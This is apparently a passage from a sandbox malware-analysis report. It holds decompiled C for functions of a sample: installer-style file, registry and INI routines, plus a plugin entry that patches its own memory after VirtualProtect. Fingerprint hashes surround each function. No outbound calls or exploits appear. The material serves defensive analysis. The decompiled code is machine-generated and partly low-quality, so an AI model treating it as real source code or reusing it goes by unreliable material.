SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057FC(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405802
0x0040580a
0x00000000
0x00405810
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00405802
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061AC(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406193();
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027e9
0x004027e9
0x004027ea
0x004027f2
0x004027f7
0x004027f8
0x00402807
0x00402810
0x00402a61
0x00402a62
0x00402a65
0x00402a65
0x00402810
0x00402ac2
0x00402ace

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807

Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
Instruction ID: 8e859e92f5722eba9353145e96b7f7bbf63091ba891c9fc52d729c0f29c6f3b3
Opcode Fuzzy Hash: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
Instruction Fuzzy Hash: A0E09271E00104AFDB11EFA5AE498AE7779DB40304B14403BF101F51D2CA790D128E2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402306
0x00402306
0x00402308
0x0040230c
0x0040230f
0x00402314
0x00402319
0x00402322
0x00402322
0x00402327
0x00402330
0x00402330
0x0040233d
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D

Uniqueness

Uniqueness Score: -1.00%

Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060E7(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060f1
0x004060fa
0x00406110
0x00000000
0x00406110
0x004060fe
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dc5
0x00405dd5
0x00405ddd
0x00000000
0x00405de4
0x00000000
0x00405de6

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DF0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405df4
0x00405e04
0x00405e0c
0x00000000
0x00405e13
0x00000000
0x00405e15

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8

Uniqueness

Uniqueness Score: -1.00%

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027cb
0x100027d0
0x100027e0
0x100027e8
0x100027ef
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x1000280d
0x10002815

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Uniqueness

Uniqueness Score: -1.00%

Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B9(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060c3
0x004060ca
0x004060dd
0x00000000
0x004060dd
0x004060ce
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,Call,?), ref: 004060DD

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
Opcode Fuzzy Hash: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040422D(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291d8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x0040422d
0x00404234
0x0040423f
0x00000000
0x0040423f
0x00404245

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
